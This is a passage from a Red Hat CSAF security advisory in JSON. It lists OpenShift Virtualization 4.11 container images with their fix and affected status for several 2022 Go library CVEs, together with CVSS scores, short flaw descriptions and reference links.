"8Base-CNV-4.11:container-native-virtualization/kubevirt-console-plugin@sha256:884d54355a5e3f66f2916a4fd6bb182a2450f2c6a800176befc7a74b7b5cd5c9_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-ssp-operator@sha256:989137caa24e0604c230e84a7a65b7efc38ef68ef55ffe78353c51c58dd63e14_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-cleanup-vm@sha256:b4151b401146f609a0647886845233d6bd1561aaaba72866fcad6d3f4539f950_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-copy-template@sha256:34e68039c045ac22068a557d548b420ab04cda5fa755404ee1c850aa6817747f_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-create-datavolume@sha256:56de4ec139a88c5f61a0cd87dc405e208992a9cf343cc6925094cbefb533f2ce_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-create-vm-from-template@sha256:7c16943b0da0e7c886c2cad5a87c92db111a96b842f66971862d2d81df0a92f2_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-disk-virt-customize@sha256:c0fd52ef347d2cd496a98ea67ed432074127cb6f86e64798f452968d26e39594_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-disk-virt-sysprep@sha256:da18128194e3574952655b623395d330fd82912fc598b0804762f039cd7bd713_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-modify-vm-template@sha256:4747611e2b2648b3d765e6c728d80d339a25dd20664ecc57b70a1e09d71eee64_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-operator@sha256:2c008c250adad10a90fad4a7be1825ba4d950a7fbf9134c7a08346c5e0483c26_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-wait-for-vmi-status@sha256:afe3a2b76c42e27399cb71fb3c02317e89cb5f3201f9f95ec0bfa9e74c4775c4_amd64", "8Base-CNV-4.11:container-native-virtualization/libguestfs-tools@sha256:083c332bd90cb8fbb02182926985accff8ba9a4ca351a6a7c049cb173e2cea00_amd64", "8Base-CNV-4.11:container-native-virtualization/ovs-cni-marker@sha256:612d67e74b6b682ea1d6358c7e766c2c499ac747ec6778a45f289ea597da736d_amd64", "8Base-CNV-4.11:container-native-virtualization/ovs-cni-plugin@sha256:3cffc89502ab45e9b47721cbca140d7946fd8afab6f1f9c6f17c17ea24374869_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-api@sha256:e47dc1188b335a23bbaf9aec8df03fd78dc4b62b3e41f06bc67a408363016e05_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-artifacts-server@sha256:412af0af13fb583eb59bf00c544b2feef9f02bfcec9776ccce1750d781a35341_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-cdi-apiserver@sha256:6481694e07d022162c4512c3e346bd10718219c6ed78bed0bdbb759c9be3d434_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-cdi-cloner@sha256:578e2134d5a174249a374de5c26532db98fca13a571e81ac6839ba88beb19a01_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-cdi-controller@sha256:474a57191da17d55a2a4c85fc6babbf6a052a244cd6edaa8bb67cb3987be8e7c_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-cdi-importer@sha256:722bdbb1303c5c631dc574fd4d5873623f2b5cee18f14970ddd224a50c819b9f_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-cdi-operator@sha256:f2371c3df8800ed745ee00b2037c932e9889271d6b47f5fd4df72c0dd4559f70_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-cdi-uploadproxy@sha256:69fbd2dee5cad3adfd2b85584e1c095a5896346497e0a58def70806f77687386_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-cdi-uploadserver@sha256:056d9fa9dff8ba2eca829403a5d0190a3bf2767e6ab37e7b46b4cc1885e1e2df_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-controller@sha256:a07a7931e8778971d6e3a73fdd0cabb442e057505d6364d98adcfa2d088b4858_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-handler@sha256:81840626baefd6558db56a060ad37ecbd21378b3a96bfe525727f8ab64b02462_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-launcher@sha256:ca64a5d33cae1ddec96abde09f97ef0845a40bf2676a319dd3fb1f1737b1826d_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-operator@sha256:69c97e3d7f039edc5a8c7075dde0114ebdb56d62cf9e4d921b40ef3847f0c75c_amd64", "8Base-CNV-4.11:container-native-virtualization/virtio-win@sha256:3f4a86de5c9046c44a792a75fe056976dd6763afdba22a9aededa9ed2ab781d9_amd64", "8Base-CNV-4.11:container-native-virtualization/vm-network-latency-checkup@sha256:b7e272aa99af11856b4a2d6a7f1cea4258aef13e02e0b34c7e076b3798c8169d_amd64" ] }, "references": [ { "category": "self", "summary": "Canonical URL", "url": "https://access.redhat.com/security/cve/CVE-2022-23806" }, { "category": "external", "summary": "RHBZ#2053429", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2053429" }, { "category": "external", "summary": "https://www.cve.org/CVERecord?id=CVE-2022-23806", "url": "https://www.cve.org/CVERecord?id=CVE-2022-23806" }, { "category": "external", "summary": "https://nvd.nist.gov/vuln/detail/CVE-2022-23806", "url": "https://nvd.nist.gov/vuln/detail/CVE-2022-23806" }, { "category": "external", "summary": "https://groups.google.com/g/golang-announce/c/SUsQn0aSgPQ", "url": "https://groups.google.com/g/golang-announce/c/SUsQn0aSgPQ" } ], "release_date": "2022-02-11T00:00:00+00:00", "remediations": [ { "category": "vendor_fix", "date": "2022-09-14T19:28:51+00:00", "details": "For details on how to apply this update, which includes the changes described in this advisory, refer to:\n\nhttps://access.redhat.com/articles/11258", "product_ids": [ "8Base-CNV-4.11:container-native-virtualization/kubemacpool@sha256:9eb14ac44a379de4a6fe8583f582b2e39fd056beeab9951cd783e31340c0ce6a_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-template-validator@sha256:b8122af35a7695f7cf99e4d36546920570e408cfba2b45c90ffd4dd2ddf47c77_amd64" ], "restart_required": { "category": "none" }, "url": "https://access.redhat.com/errata/RHSA-2022:6526" } ], "scores": [ { "cvss_v3": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 7.1, "baseSeverity": "HIGH", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "privilegesRequired": "LOW", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:H", "version": "3.1" }, "products": [ "8Base-CNV-4.11:container-native-virtualization/kubemacpool@sha256:9eb14ac44a379de4a6fe8583f582b2e39fd056beeab9951cd783e31340c0ce6a_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-template-validator@sha256:b8122af35a7695f7cf99e4d36546920570e408cfba2b45c90ffd4dd2ddf47c77_amd64" ] } ], "threats": [ { "category": "impact", "details": "Moderate" } ], "title": "golang: crypto/elliptic: IsOnCurve returns true for invalid field elements" }, { "cve": "CVE-2022-24675", "cwe": { "id": "CWE-120", "name": "Buffer Copy without Checking Size of Input (\u0027Classic Buffer Overflow\u0027)" }, "discovery_date": "2022-04-21T00:00:00+00:00", "flags": [ { "label": "vulnerable_code_not_present", "product_ids": [ "8Base-CNV-4.11:container-native-virtualization/checkup-framework@sha256:055aa6e280af9bfec4c8864f4d9ed79c22bd864829cff855650ef7fed092c815_amd64", "8Base-CNV-4.11:container-native-virtualization/cnv-must-gather-rhel8@sha256:3d364b59962f15123ba6ce8b2d49b1cd38b3f1d540b3b4c0a1858e93b6cba011_amd64", "8Base-CNV-4.11:container-native-virtualization/hco-bundle-registry@sha256:b83c2f51067335600cc20a39a9d911ad110d700ef46f53e7a18af4e534a77534_amd64", "8Base-CNV-4.11:container-native-virtualization/hyperconverged-cluster-operator@sha256:9522cee60c82b120a4dd131f6dc690786740dd85ce5e7f83171823c4b7aa93e0_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-console-plugin@sha256:884d54355a5e3f66f2916a4fd6bb182a2450f2c6a800176befc7a74b7b5cd5c9_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-ssp-operator@sha256:989137caa24e0604c230e84a7a65b7efc38ef68ef55ffe78353c51c58dd63e14_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-cleanup-vm@sha256:b4151b401146f609a0647886845233d6bd1561aaaba72866fcad6d3f4539f950_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-copy-template@sha256:34e68039c045ac22068a557d548b420ab04cda5fa755404ee1c850aa6817747f_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-create-datavolume@sha256:56de4ec139a88c5f61a0cd87dc405e208992a9cf343cc6925094cbefb533f2ce_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-create-vm-from-template@sha256:7c16943b0da0e7c886c2cad5a87c92db111a96b842f66971862d2d81df0a92f2_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-disk-virt-customize@sha256:c0fd52ef347d2cd496a98ea67ed432074127cb6f86e64798f452968d26e39594_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-disk-virt-sysprep@sha256:da18128194e3574952655b623395d330fd82912fc598b0804762f039cd7bd713_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-modify-vm-template@sha256:4747611e2b2648b3d765e6c728d80d339a25dd20664ecc57b70a1e09d71eee64_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-operator@sha256:2c008c250adad10a90fad4a7be1825ba4d950a7fbf9134c7a08346c5e0483c26_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-wait-for-vmi-status@sha256:afe3a2b76c42e27399cb71fb3c02317e89cb5f3201f9f95ec0bfa9e74c4775c4_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-template-validator@sha256:b8122af35a7695f7cf99e4d36546920570e408cfba2b45c90ffd4dd2ddf47c77_amd64", "8Base-CNV-4.11:container-native-virtualization/libguestfs-tools@sha256:083c332bd90cb8fbb02182926985accff8ba9a4ca351a6a7c049cb173e2cea00_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-api@sha256:e47dc1188b335a23bbaf9aec8df03fd78dc4b62b3e41f06bc67a408363016e05_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-artifacts-server@sha256:412af0af13fb583eb59bf00c544b2feef9f02bfcec9776ccce1750d781a35341_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-cdi-apiserver@sha256:6481694e07d022162c4512c3e346bd10718219c6ed78bed0bdbb759c9be3d434_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-cdi-controller@sha256:474a57191da17d55a2a4c85fc6babbf6a052a244cd6edaa8bb67cb3987be8e7c_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-cdi-importer@sha256:722bdbb1303c5c631dc574fd4d5873623f2b5cee18f14970ddd224a50c819b9f_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-cdi-operator@sha256:f2371c3df8800ed745ee00b2037c932e9889271d6b47f5fd4df72c0dd4559f70_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-cdi-uploadproxy@sha256:69fbd2dee5cad3adfd2b85584e1c095a5896346497e0a58def70806f77687386_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-cdi-uploadserver@sha256:056d9fa9dff8ba2eca829403a5d0190a3bf2767e6ab37e7b46b4cc1885e1e2df_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-controller@sha256:a07a7931e8778971d6e3a73fdd0cabb442e057505d6364d98adcfa2d088b4858_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-handler@sha256:81840626baefd6558db56a060ad37ecbd21378b3a96bfe525727f8ab64b02462_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-launcher@sha256:ca64a5d33cae1ddec96abde09f97ef0845a40bf2676a319dd3fb1f1737b1826d_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-operator@sha256:69c97e3d7f039edc5a8c7075dde0114ebdb56d62cf9e4d921b40ef3847f0c75c_amd64", "8Base-CNV-4.11:container-native-virtualization/virtio-win@sha256:3f4a86de5c9046c44a792a75fe056976dd6763afdba22a9aededa9ed2ab781d9_amd64", "8Base-CNV-4.11:container-native-virtualization/vm-network-latency-checkup@sha256:b7e272aa99af11856b4a2d6a7f1cea4258aef13e02e0b34c7e076b3798c8169d_amd64" ] } ], "ids": [ { "system_name": "Red Hat Bugzilla ID", "text": "2077688" } ], "notes": [ { "category": "description", "text": "A buffer overflow flaw was found in Golang\u0027s library encoding/pem. This flaw allows an attacker to use a large PEM input (more than 5 MB), causing a stack overflow in Decode, which leads to a loss of availability.", "title": "Vulnerability description" }, { "category": "summary", "text": "golang: encoding/pem: fix stack overflow in Decode", "title": "Vulnerability summary" }, { "category": "other", "text": "Red Hat Enterprise Linux 7, 8 and 9 are affected, because the code-base is affected by this vulnerability.\n\nRed Hat Product Security has rated this issue as having Moderate security impact, and the issue is not currently planned to be addressed in future updates for Red Hat Enterprise Linux 7, hence, marked as Out-of-Support-Scope.\n\nRed Hat Developer Tools - Compilers (go-toolset-1.16-golang \u0026 go-toolset-1.17-golang), ships the vulnerable code and affected by this vulnerability.\n\nFor additional information, refer to the Issue Severity Classification: https://access.redhat.com/security/updates/classification/ and Red Hat Enterprise Linux Life Cycle \u0026 Updates Policy: https://access.redhat.com/support/policy/updates/errata/.", "title": "Statement" }, { "category": "general", "text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.", "title": "CVSS score applicability" } ], "product_status": { "fixed": [ "8Base-CNV-4.11:container-native-virtualization/bridge-marker@sha256:faa1f729980217c7ffefa2134d5e8d851a6fb7913be7c6edf8ab7c3277b6f53d_amd64", "8Base-CNV-4.11:container-native-virtualization/cluster-network-addons-operator@sha256:c7475f5f5d2c24bffc410c39168d4eba8bffa64b7e220a51291ed4e6bf053c6f_amd64", "8Base-CNV-4.11:container-native-virtualization/cnv-containernetworking-plugins@sha256:af41f3c3f2b88a74bfe29c6001ca5e472bb9673150bfc0be35ffad66a012a573_amd64", "8Base-CNV-4.11:container-native-virtualization/hostpath-csi-driver-rhel8@sha256:562548cfd4fd0327e3cd25365251eed5abe1aafbf394b0a112b79039c802c3c3_amd64", "8Base-CNV-4.11:container-native-virtualization/hostpath-csi-driver@sha256:562548cfd4fd0327e3cd25365251eed5abe1aafbf394b0a112b79039c802c3c3_amd64", "8Base-CNV-4.11:container-native-virtualization/hostpath-provisioner-rhel8-operator@sha256:37cb86f8d15856f112cff0440638cd976572216a84afac2d11c8a2188f86be34_amd64", "8Base-CNV-4.11:container-native-virtualization/hostpath-provisioner-rhel8@sha256:ef1f3bfc036762d9060f490912fd1b43d9ce3b9c542a347b77f505ba92a51906_amd64", "8Base-CNV-4.11:container-native-virtualization/hyperconverged-cluster-webhook-rhel8@sha256:5a70d43a90d0860ca367c004fedc7a3b82132327a9d9e6bbb1d1244cd7fddb13_amd64", "8Base-CNV-4.11:container-native-virtualization/kubemacpool@sha256:9eb14ac44a379de4a6fe8583f582b2e39fd056beeab9951cd783e31340c0ce6a_amd64", "8Base-CNV-4.11:container-native-virtualization/ovs-cni-marker@sha256:612d67e74b6b682ea1d6358c7e766c2c499ac747ec6778a45f289ea597da736d_amd64", "8Base-CNV-4.11:container-native-virtualization/ovs-cni-plugin@sha256:3cffc89502ab45e9b47721cbca140d7946fd8afab6f1f9c6f17c17ea24374869_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-cdi-cloner@sha256:578e2134d5a174249a374de5c26532db98fca13a571e81ac6839ba88beb19a01_amd64" ], "known_not_affected": [ "8Base-CNV-4.11:container-native-virtualization/checkup-framework@sha256:055aa6e280af9bfec4c8864f4d9ed79c22bd864829cff855650ef7fed092c815_amd64", "8Base-CNV-4.11:container-native-virtualization/cnv-must-gather-rhel8@sha256:3d364b59962f15123ba6ce8b2d49b1cd38b3f1d540b3b4c0a1858e93b6cba011_amd64", "8Base-CNV-4.11:container-native-virtualization/hco-bundle-registry@sha256:b83c2f51067335600cc20a39a9d911ad110d700ef46f53e7a18af4e534a77534_amd64", "8Base-CNV-4.11:container-native-virtualization/hyperconverged-cluster-operator@sha256:9522cee60c82b120a4dd131f6dc690786740dd85ce5e7f83171823c4b7aa93e0_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-console-plugin@sha256:884d54355a5e3f66f2916a4fd6bb182a2450f2c6a800176befc7a74b7b5cd5c9_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-ssp-operator@sha256:989137caa24e0604c230e84a7a65b7efc38ef68ef55ffe78353c51c58dd63e14_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-cleanup-vm@sha256:b4151b401146f609a0647886845233d6bd1561aaaba72866fcad6d3f4539f950_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-copy-template@sha256:34e68039c045ac22068a557d548b420ab04cda5fa755404ee1c850aa6817747f_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-create-datavolume@sha256:56de4ec139a88c5f61a0cd87dc405e208992a9cf343cc6925094cbefb533f2ce_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-create-vm-from-template@sha256:7c16943b0da0e7c886c2cad5a87c92db111a96b842f66971862d2d81df0a92f2_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-disk-virt-customize@sha256:c0fd52ef347d2cd496a98ea67ed432074127cb6f86e64798f452968d26e39594_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-disk-virt-sysprep@sha256:da18128194e3574952655b623395d330fd82912fc598b0804762f039cd7bd713_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-modify-vm-template@sha256:4747611e2b2648b3d765e6c728d80d339a25dd20664ecc57b70a1e09d71eee64_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-operator@sha256:2c008c250adad10a90fad4a7be1825ba4d950a7fbf9134c7a08346c5e0483c26_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-wait-for-vmi-status@sha256:afe3a2b76c42e27399cb71fb3c02317e89cb5f3201f9f95ec0bfa9e74c4775c4_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-template-validator@sha256:b8122af35a7695f7cf99e4d36546920570e408cfba2b45c90ffd4dd2ddf47c77_amd64", "8Base-CNV-4.11:container-native-virtualization/libguestfs-tools@sha256:083c332bd90cb8fbb02182926985accff8ba9a4ca351a6a7c049cb173e2cea00_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-api@sha256:e47dc1188b335a23bbaf9aec8df03fd78dc4b62b3e41f06bc67a408363016e05_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-artifacts-server@sha256:412af0af13fb583eb59bf00c544b2feef9f02bfcec9776ccce1750d781a35341_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-cdi-apiserver@sha256:6481694e07d022162c4512c3e346bd10718219c6ed78bed0bdbb759c9be3d434_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-cdi-controller@sha256:474a57191da17d55a2a4c85fc6babbf6a052a244cd6edaa8bb67cb3987be8e7c_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-cdi-importer@sha256:722bdbb1303c5c631dc574fd4d5873623f2b5cee18f14970ddd224a50c819b9f_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-cdi-operator@sha256:f2371c3df8800ed745ee00b2037c932e9889271d6b47f5fd4df72c0dd4559f70_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-cdi-uploadproxy@sha256:69fbd2dee5cad3adfd2b85584e1c095a5896346497e0a58def70806f77687386_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-cdi-uploadserver@sha256:056d9fa9dff8ba2eca829403a5d0190a3bf2767e6ab37e7b46b4cc1885e1e2df_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-controller@sha256:a07a7931e8778971d6e3a73fdd0cabb442e057505d6364d98adcfa2d088b4858_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-handler@sha256:81840626baefd6558db56a060ad37ecbd21378b3a96bfe525727f8ab64b02462_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-launcher@sha256:ca64a5d33cae1ddec96abde09f97ef0845a40bf2676a319dd3fb1f1737b1826d_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-operator@sha256:69c97e3d7f039edc5a8c7075dde0114ebdb56d62cf9e4d921b40ef3847f0c75c_amd64", "8Base-CNV-4.11:container-native-virtualization/virtio-win@sha256:3f4a86de5c9046c44a792a75fe056976dd6763afdba22a9aededa9ed2ab781d9_amd64", "8Base-CNV-4.11:container-native-virtualization/vm-network-latency-checkup@sha256:b7e272aa99af11856b4a2d6a7f1cea4258aef13e02e0b34c7e076b3798c8169d_amd64" ] }, "references": [ { "category": "self", "summary": "Canonical URL", "url": "https://access.redhat.com/security/cve/CVE-2022-24675" }, { "category": "external", "summary": "RHBZ#2077688", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2077688" }, { "category": "external", "summary": "https://www.cve.org/CVERecord?id=CVE-2022-24675", "url": "https://www.cve.org/CVERecord?id=CVE-2022-24675" }, { "category": "external", "summary": "https://nvd.nist.gov/vuln/detail/CVE-2022-24675", "url": "https://nvd.nist.gov/vuln/detail/CVE-2022-24675" }, { "category": "external", "summary": "https://groups.google.com/g/golang-announce/c/oecdBNLOml8", "url": "https://groups.google.com/g/golang-announce/c/oecdBNLOml8" } ], "release_date": "2022-04-12T00:00:00+00:00", "remediations": [ { "category": "vendor_fix", "date": "2022-09-14T19:28:51+00:00", "details": "For details on how to apply this update, which includes the changes described in this advisory, refer to:\n\nhttps://access.redhat.com/articles/11258", "product_ids": [ "8Base-CNV-4.11:container-native-virtualization/bridge-marker@sha256:faa1f729980217c7ffefa2134d5e8d851a6fb7913be7c6edf8ab7c3277b6f53d_amd64", "8Base-CNV-4.11:container-native-virtualization/cluster-network-addons-operator@sha256:c7475f5f5d2c24bffc410c39168d4eba8bffa64b7e220a51291ed4e6bf053c6f_amd64", "8Base-CNV-4.11:container-native-virtualization/cnv-containernetworking-plugins@sha256:af41f3c3f2b88a74bfe29c6001ca5e472bb9673150bfc0be35ffad66a012a573_amd64", "8Base-CNV-4.11:container-native-virtualization/hostpath-csi-driver-rhel8@sha256:562548cfd4fd0327e3cd25365251eed5abe1aafbf394b0a112b79039c802c3c3_amd64", "8Base-CNV-4.11:container-native-virtualization/hostpath-csi-driver@sha256:562548cfd4fd0327e3cd25365251eed5abe1aafbf394b0a112b79039c802c3c3_amd64", "8Base-CNV-4.11:container-native-virtualization/hostpath-provisioner-rhel8-operator@sha256:37cb86f8d15856f112cff0440638cd976572216a84afac2d11c8a2188f86be34_amd64", "8Base-CNV-4.11:container-native-virtualization/hostpath-provisioner-rhel8@sha256:ef1f3bfc036762d9060f490912fd1b43d9ce3b9c542a347b77f505ba92a51906_amd64", "8Base-CNV-4.11:container-native-virtualization/hyperconverged-cluster-webhook-rhel8@sha256:5a70d43a90d0860ca367c004fedc7a3b82132327a9d9e6bbb1d1244cd7fddb13_amd64", "8Base-CNV-4.11:container-native-virtualization/kubemacpool@sha256:9eb14ac44a379de4a6fe8583f582b2e39fd056beeab9951cd783e31340c0ce6a_amd64", "8Base-CNV-4.11:container-native-virtualization/ovs-cni-marker@sha256:612d67e74b6b682ea1d6358c7e766c2c499ac747ec6778a45f289ea597da736d_amd64", "8Base-CNV-4.11:container-native-virtualization/ovs-cni-plugin@sha256:3cffc89502ab45e9b47721cbca140d7946fd8afab6f1f9c6f17c17ea24374869_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-cdi-cloner@sha256:578e2134d5a174249a374de5c26532db98fca13a571e81ac6839ba88beb19a01_amd64" ], "restart_required": { "category": "none" }, "url": "https://access.redhat.com/errata/RHSA-2022:6526" } ], "scores": [ { "cvss_v3": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 7.5, "baseSeverity": "HIGH", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "version": "3.1" }, "products": [ "8Base-CNV-4.11:container-native-virtualization/bridge-marker@sha256:faa1f729980217c7ffefa2134d5e8d851a6fb7913be7c6edf8ab7c3277b6f53d_amd64", "8Base-CNV-4.11:container-native-virtualization/cluster-network-addons-operator@sha256:c7475f5f5d2c24bffc410c39168d4eba8bffa64b7e220a51291ed4e6bf053c6f_amd64", "8Base-CNV-4.11:container-native-virtualization/cnv-containernetworking-plugins@sha256:af41f3c3f2b88a74bfe29c6001ca5e472bb9673150bfc0be35ffad66a012a573_amd64", "8Base-CNV-4.11:container-native-virtualization/hostpath-csi-driver-rhel8@sha256:562548cfd4fd0327e3cd25365251eed5abe1aafbf394b0a112b79039c802c3c3_amd64", "8Base-CNV-4.11:container-native-virtualization/hostpath-csi-driver@sha256:562548cfd4fd0327e3cd25365251eed5abe1aafbf394b0a112b79039c802c3c3_amd64", "8Base-CNV-4.11:container-native-virtualization/hostpath-provisioner-rhel8-operator@sha256:37cb86f8d15856f112cff0440638cd976572216a84afac2d11c8a2188f86be34_amd64", "8Base-CNV-4.11:container-native-virtualization/hostpath-provisioner-rhel8@sha256:ef1f3bfc036762d9060f490912fd1b43d9ce3b9c542a347b77f505ba92a51906_amd64", "8Base-CNV-4.11:container-native-virtualization/hyperconverged-cluster-webhook-rhel8@sha256:5a70d43a90d0860ca367c004fedc7a3b82132327a9d9e6bbb1d1244cd7fddb13_amd64", "8Base-CNV-4.11:container-native-virtualization/kubemacpool@sha256:9eb14ac44a379de4a6fe8583f582b2e39fd056beeab9951cd783e31340c0ce6a_amd64", "8Base-CNV-4.11:container-native-virtualization/ovs-cni-marker@sha256:612d67e74b6b682ea1d6358c7e766c2c499ac747ec6778a45f289ea597da736d_amd64", "8Base-CNV-4.11:container-native-virtualization/ovs-cni-plugin@sha256:3cffc89502ab45e9b47721cbca140d7946fd8afab6f1f9c6f17c17ea24374869_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-cdi-cloner@sha256:578e2134d5a174249a374de5c26532db98fca13a571e81ac6839ba88beb19a01_amd64" ] } ], "threats": [ { "category": "impact", "details": "Moderate" } ], "title": "golang: encoding/pem: fix stack overflow in Decode" }, { "cve": "CVE-2022-24921", "cwe": { "id": "CWE-400", "name": "Uncontrolled Resource Consumption" }, "discovery_date": "2022-03-16T00:00:00+00:00", "flags": [ { "label": "vulnerable_code_not_present", "product_ids": [ "8Base-CNV-4.11:container-native-virtualization/checkup-framework@sha256:055aa6e280af9bfec4c8864f4d9ed79c22bd864829cff855650ef7fed092c815_amd64", "8Base-CNV-4.11:container-native-virtualization/cnv-must-gather-rhel8@sha256:3d364b59962f15123ba6ce8b2d49b1cd38b3f1d540b3b4c0a1858e93b6cba011_amd64", "8Base-CNV-4.11:container-native-virtualization/hco-bundle-registry@sha256:b83c2f51067335600cc20a39a9d911ad110d700ef46f53e7a18af4e534a77534_amd64", "8Base-CNV-4.11:container-native-virtualization/hostpath-csi-driver-rhel8@sha256:562548cfd4fd0327e3cd25365251eed5abe1aafbf394b0a112b79039c802c3c3_amd64", "8Base-CNV-4.11:container-native-virtualization/hostpath-csi-driver@sha256:562548cfd4fd0327e3cd25365251eed5abe1aafbf394b0a112b79039c802c3c3_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-console-plugin@sha256:884d54355a5e3f66f2916a4fd6bb182a2450f2c6a800176befc7a74b7b5cd5c9_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-ssp-operator@sha256:989137caa24e0604c230e84a7a65b7efc38ef68ef55ffe78353c51c58dd63e14_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-cleanup-vm@sha256:b4151b401146f609a0647886845233d6bd1561aaaba72866fcad6d3f4539f950_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-copy-template@sha256:34e68039c045ac22068a557d548b420ab04cda5fa755404ee1c850aa6817747f_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-create-datavolume@sha256:56de4ec139a88c5f61a0cd87dc405e208992a9cf343cc6925094cbefb533f2ce_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-create-vm-from-template@sha256:7c16943b0da0e7c886c2cad5a87c92db111a96b842f66971862d2d81df0a92f2_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-disk-virt-customize@sha256:c0fd52ef347d2cd496a98ea67ed432074127cb6f86e64798f452968d26e39594_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-disk-virt-sysprep@sha256:da18128194e3574952655b623395d330fd82912fc598b0804762f039cd7bd713_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-modify-vm-template@sha256:4747611e2b2648b3d765e6c728d80d339a25dd20664ecc57b70a1e09d71eee64_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-operator@sha256:2c008c250adad10a90fad4a7be1825ba4d950a7fbf9134c7a08346c5e0483c26_amd64", 